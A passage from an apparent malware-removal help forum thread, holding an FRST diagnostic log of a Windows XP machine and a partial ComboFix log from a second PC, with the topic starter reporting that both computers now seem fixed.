FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff
FF Extension: Java Quick Starter - C:\Program Files\Java\jre6\lib\deploy\jqs\ff [2009-08-22]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-12-27]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-01-01]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR CustomProfile: C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-24]
CHR Extension: (Google Drive) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-24]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-31]
CHR Extension: (YouTube) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-24]
CHR Extension: (Google Search) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-24]
CHR Extension: (Google Wallet) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-24]
CHR Extension: (Gmail) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-24]
CHR HKLM\...\Chrome\Extension: [./0123456789:;<=>?@ABCDEFGHIJKLM] - C:\Documents and Settings\Lazer\Local Settings\Application Data\¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 Amadeus Automatic Update; C:\Program Files\Automatic Update\AutoUpdate.exe [236384 2013-03-28] (Amadeus)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1341664 2013-03-04] (ESET)
R2 File Backup; C:\Program Files\Workspace\offSyncService.exe [1187040 2013-07-22] (Starfield Technologies)
R2 GoToAssist Remote Support Customer; C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe [610888 2014-06-18] (Citrix Online, a division of Citrix Systems, Inc.)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-01-30] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [145920 2010-10-25] (HP) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre6\bin\jqs.exe [153376 2009-07-25] (Sun Microsystems, Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe [366152 2011-08-31] (Malwarebytes Corporation)
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-05-31] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2012-01-10] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2012-01-10] (Intuit Inc.) [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
S3 BVRPMPR5; C:\WINDOWS\system32\drivers\BVRPMPR5.SYS [49904 2009-08-25] (Avanquest Software) [File not signed]
R1 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [161368 2013-01-10] (ESET)
R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [122240 2013-01-10] (ESET)
R1 epfwtdir; C:\WINDOWS\System32\DRIVERS\epfwtdir.sys [105784 2013-01-10] (ESET)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [12288 2014-01-07] ()
S3 EsgScanner; C:\WINDOWS\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
R3 HPFXBULKLEDM; C:\WINDOWS\System32\drivers\hppcbulkio.sys [20504 2010-12-14] (Hewlett Packard)
R3 HPFXFAX; C:\WINDOWS\System32\drivers\hppcfaxio.sys [21528 2010-12-14] (Hewlett Packard)
R3 k57w2k; C:\WINDOWS\System32\DRIVERS\k57xp32.sys [176640 2008-06-19] (Broadcom Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [22216 2011-08-31] (Malwarebytes Corporation)
R2 monblanking; C:\WINDOWS\System32\DRIVERS\monblanking.sys [29280 2014-01-30] (Citrix Systems, Inc.)
R0 SFAUDIO; C:\WINDOWS\System32\drivers\sfaudio.sys [24064 2008-07-15] (Sonic Focus, Inc)
U3 .serial; \? [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 13:52 - 2014-09-01 14:15 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Fr
2014-09-01 13:52 - 2014-09-01 13:54 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-09-01 13:10 - 2014-09-01 13:09 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-02.dmp
2014-09-01 12:59 - 2014-09-01 12:59 - 00000000 ____D () C:\Qoobox
2014-09-01 12:44 - 2014-09-01 12:44 - 00048250 _____ () C:\Documents and Settings\LW\Desktop\FRST.txt
2014-09-01 12:43 - 2014-09-01 12:43 - 00037157 _____ () C:\Documents and Settings\LW\Desktop\Addition.txt
2014-09-01 12:29 - 2014-09-01 14:15 - 00000000 ____D () C:\FRST
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:38 - 2014-09-01 11:39 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:38 - 2014-09-01 11:39 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 14:13 - 00079339 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 10:57 - 2014-09-01 11:37 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 00:02 - 2014-09-01 13:24 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:53 - 2014-08-31 23:54 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:31 - 2014-08-31 23:43 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:24 - 2014-09-01 10:57 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:09 - 2014-08-31 21:12 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 19:52 - 2014-09-01 14:02 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-08-31 19:52 - 2014-08-31 23:04 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 19:52 - 2014-08-31 20:27 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 19:52 - 2014-08-31 20:24 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 19:52 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 19:52 - 2009-08-22 04:19 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\PowerDVD DX
2014-08-31 19:52 - 2009-08-22 04:15 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Sun
2014-08-31 19:52 - 2009-08-22 04:14 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Windows Desktop Search
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:26 - 2014-09-01 14:02 - 01114112 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 14:15 - 2014-09-01 13:52 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Fr
2014-09-01 14:15 - 2014-09-01 12:29 - 00000000 ____D () C:\FRST
2014-09-01 14:15 - 2014-01-01 21:55 - 00000416 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{437A7727-9511-41A1-9450-7A7409618CA2}.job
2014-09-01 14:15 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Temp
2014-09-01 14:13 - 2014-09-01 10:57 - 00079339 _____ () C:\WINDOWS\WindowsUpdate.log
2014-09-01 14:13 - 2008-04-25 12:16 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
2014-09-01 14:12 - 2014-01-01 22:41 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-09-01 14:12 - 2014-01-01 22:41 - 00000048 _____ () C:\WINDOWS\wiaservc.log
2014-09-01 14:12 - 2010-05-25 13:03 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-01 14:12 - 2010-05-24 19:48 - 00000278 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-09-01 14:12 - 2008-04-25 17:32 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-09-01 14:02 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Temp
2014-09-01 14:02 - 2014-08-31 14:26 - 01114112 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-09-01 14:02 - 2014-01-01 21:50 - 00032452 _____ () C:\WINDOWS\SchedLgU.Txt
2014-09-01 14:02 - 2014-01-01 21:50 - 00000278 ___SH () C:\Documents and Settings\LW\ntuser.ini
2014-09-01 13:59 - 2008-04-25 17:32 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
2014-09-01 13:59 - 2008-04-25 17:32 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\Temp
2014-09-01 13:54 - 2014-09-01 13:52 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-09-01 13:25 - 2012-06-05 19:32 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-09-01 13:24 - 2014-09-01 00:02 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-01 13:09 - 2014-09-01 13:10 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-02.dmp
2014-09-01 12:59 - 2014-09-01 12:59 - 00000000 ____D () C:\Qoobox
2014-09-01 12:44 - 2014-09-01 12:44 - 00048250 _____ () C:\Documents and Settings\LW\Desktop\FRST.txt
2014-09-01 12:43 - 2014-09-01 12:43 - 00037157 _____ () C:\Documents and Settings\LW\Desktop\Addition.txt
2014-09-01 12:13 - 2010-05-25 13:03 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-01 11:50 - 2014-09-01 11:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\offsync
2014-09-01 11:41 - 2014-01-01 22:04 - 00000000 ____D () C:\Documents and Settings\LW\My Documents\QickBooks_Files
2014-09-01 11:41 - 2011-09-01 13:01 - 00000000 ____D () C:\Program Files\Workspace
2014-09-01 11:39 - 2014-09-01 11:38 - 00001365 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceInstall.log
2014-09-01 11:39 - 2014-09-01 11:38 - 00000613 _____ () C:\Documents and Settings\LW\My Documents\WorkspaceUpdate.log
2014-09-01 11:39 - 2014-02-04 21:37 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Mozilla
2014-09-01 11:38 - 2014-09-01 11:38 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Workspace
2014-09-01 11:37 - 2014-09-01 10:57 - 00001304 _____ () C:\WINDOWS\offSyncService.log
2014-09-01 11:23 - 2013-03-22 18:19 - 00000213 ___SH () C:\boot.ini
2014-09-01 11:23 - 2009-12-25 13:47 - 00000000 ____D () C:\WINDOWS\pss
2014-09-01 11:23 - 2008-04-25 12:16 - 00000603 _____ () C:\WINDOWS\win.ini
2014-09-01 11:23 - 2008-04-25 12:16 - 00000227 _____ () C:\WINDOWS\system.ini
2014-09-01 10:58 - 2014-09-01 10:58 - 00000733 _____ () C:\Documents and Settings\Mr W\Desktop\DesktopTools.lnk
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Workspace
2014-09-01 10:58 - 2014-09-01 10:58 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Apple Computer
2014-09-01 10:57 - 2014-09-01 10:57 - 00266208 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-09-01 10:57 - 2014-09-01 10:57 - 00090112 _____ () C:\WINDOWS\Minidump\Mini090114-01.dmp
2014-09-01 10:57 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\BoostSoftware
2014-09-01 10:57 - 2014-02-25 11:09 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-01 10:57 - 2012-07-02 21:03 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-01 10:57 - 2012-01-04 15:53 - 00000000 ____D () C:\WINDOWS\Minidump
2014-09-01 00:02 - 2014-09-01 00:02 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-31 23:54 - 2014-08-31 23:53 - 05576326 ____R (Swearware) C:\Documents and Settings\LW\Desktop\ComboFix.exe
2014-08-31 23:43 - 2014-08-31 23:31 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\NPE
2014-08-31 23:31 - 2011-08-28 03:25 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Norton
2014-08-31 23:24 - 2014-08-31 23:24 - 00000000 ____D () C:\Documents and Settings\LW\Desktop\Old Firefox Data
2014-08-31 23:04 - 2014-08-31 19:52 - 00000178 ___SH () C:\Documents and Settings\Mr W\ntuser.ini
2014-08-31 22:09 - 2014-01-01 21:50 - 00001601 _____ () C:\Documents and Settings\LW\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:37 - 2008-04-25 17:29 - 00001601 _____ () C:\Documents and Settings\Default User\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:20 - 2008-04-25 17:32 - 00001601 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 21:12 - 2014-08-31 21:12 - 00001973 _____ () C:\Documents and Settings\Mr W\Desktop\SpyHunter.lnk
2014-08-31 21:12 - 2014-08-31 21:12 - 00000990 _____ () C:\WINDOWS\setupapi.log
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\sh4ldr
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-08-31 21:12 - 2014-08-31 21:12 - 00000000 ____D () C:\Documents and Settings\Mr W\Start Menu\Programs\SpyHunter
2014-08-31 21:12 - 2014-08-31 21:09 - 00000000 ____D () C:\WINDOWS\B2C80E75240948EC8D4828113DF74915.TMP
2014-08-31 21:06 - 2014-08-31 21:06 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-08-31 21:01 - 2014-08-31 21:01 - 00727424 _____ (Enigma Software Group USA, LLC.) C:\Documents and Settings\Mr W\My Documents\SHDownloader-FULL.exe
2014-08-31 20:50 - 2009-12-31 18:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ParetoLogic
2014-08-31 20:49 - 2009-12-31 18:33 - 00000000 ____D () C:\Program Files\ParetoLogic
2014-08-31 20:47 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At49.job
2014-08-31 20:27 - 2014-08-31 19:52 - 00001601 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Remote Assistance.LNK
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\ParetoLogic
2014-08-31 20:26 - 2014-08-31 20:26 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\DriverCure
2014-08-31 20:25 - 2014-08-31 20:25 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Macromedia
2014-08-31 20:24 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W
2014-08-31 20:24 - 2011-03-24 16:51 - 00000684 _____ () C:\Documents and Settings\All Users\Desktop\CCleaner.lnk
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-31 20:24 - 2011-03-24 16:51 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\CCleaner
2014-08-31 20:23 - 2014-08-31 20:23 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Google
2014-08-31 20:23 - 2014-08-31 19:52 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Google
2014-08-31 20:22 - 2010-05-24 19:47 - 00000000 ____D () C:\Program Files\Google
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Local Settings\Application Data\Adobe
2014-08-31 20:21 - 2014-08-31 20:21 - 00000000 ____D () C:\Documents and Settings\Mr W\Application Data\Adobe
2014-08-31 19:52 - 2014-08-31 19:52 - 00000805 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Internet Explorer.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000790 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000784 _____ () C:\Documents and Settings\Mr W\Desktop\Windows Media Player.lnk
2014-08-31 19:52 - 2014-08-31 19:52 - 00000740 _____ () C:\Documents and Settings\Mr W\Start Menu\Programs\Outlook Express.LNK
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 __SHD () C:\Documents and Settings\Mr W\IETldCache
2014-08-31 19:52 - 2014-08-31 19:52 - 00000000 ___RD () C:\Documents and Settings\Mr W\Start Menu\Programs\Accessories
2014-08-31 15:50 - 2009-08-31 05:33 - 00000000 ____D () C:\WINDOWS\system32\appmgmt
2014-08-31 15:20 - 2014-01-01 21:51 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\Amadeus
2014-08-31 14:30 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At51.job
2014-08-31 14:28 - 2014-08-31 14:28 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-31 14:21 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\security
2014-08-31 14:16 - 2014-08-31 14:16 - 00000000 ____D () C:\Documents and SettiInternet Files
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-31 14:15 - 2014-08-31 14:15 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-31 14:15 - 2008-04-25 17:34 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-31 14:15 - 2008-04-25 17:25 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-31 14:15 - 2008-04-25 05:17 - 00000000 ____D () C:\WINDOWS\Help
2014-08-31 14:14 - 2014-08-31 14:14 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-31 10:15 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At1.job
2014-08-30 18:42 - 2014-02-13 19:42 - 00000374 _____ () C:\WINDOWS\Tasks\At50.job
2014-08-30 08:17 - 2013-08-02 12:07 - 00000284 _____ () C:\WINDOWS\Tasks\AppleSoftwareUpdate.job
2014-08-29 04:15 - 2009-08-30 17:02 - 00000000 ____D () C:\Program Files\Automatic Update
2014-08-29 01:57 - 2009-12-31 18:36 - 00000380 _____ () C:\WINDOWS\Tasks\DriverCure.job
2014-08-28 20:54 - 2014-01-01 21:50 - 00000000 ____D () C:\Documents and Settings\LW
2014-08-27 23:39 - 2014-01-01 22:20 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\Intuit
2014-08-27 23:38 - 2010-02-26 15:12 - 00000090 _____ () C:\WINDOWS\QBChanUtil_Trigger.ini
2014-08-27 17:52 - 2010-05-24 19:48 - 00000286 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job
2014-08-23 10:28 - 2014-02-13 19:42 - 00000000 ____D () C:\Documents and Settings\LW\Application Data\HpUpdate
2014-08-13 15:13 - 2014-07-24 18:07 - 00001815 _____ () C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================



#8 litepc

litepc
  • Topic Starter


Posted 01 September 2014 - 01:43 PM

I think that PC2 is fixed... maybe it has other issues that it had way before this one.

But I no longer see all the DLLs running, and it works real fast, the way it should.

I am not sure if it has anything to do with me trying ComboFix before I asked you.

But I did all the steps you gave me after, and it seems to work. Is it just a miracle?



#9 litepc

litepc
  • Topic Starter


Posted 01 September 2014 - 01:46 PM

Here is the log file for ComboFix on PC 1, and I think it is fixed... Amazing.


ComboFix 14-08-31.01 - FD-2 09/01/2014  14:10:56.1.4 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.6046.4579 [GMT -4:00]
Running from: c:\users\FD-2\Desktop\FixStuff\ComboFix.exe
AV: ESET NOD32 Antivirus 6.0 *Disabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 6.0 *Disabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\FD-2\AppData\Roaming\1712912303
c:\users\FD-2\AppData\Roaming\1712912303\2556214959.js
c:\users\FD-2\AppData\Roaming\1712912303\3742126036.js
c:\users\FD-2\AppData\Roaming\1712912303\manifest.json
c:\users\FD-2\AppData\Roaming\2433510085
c:\users\FD-2\AppData\Roaming\2433510085\2556214959.js
c:\users\FD-2\AppData\Roaming\2433510085\3742126036.js
c:\users\FD-2\AppData\Roaming\2433510085\manifest.json
c:\users\FD-2\AppData\Roaming\3353960855
c:\users\FD-2\AppData\Roaming\3473679561
c:\users\FD-2\AppData\Roaming\3617758948
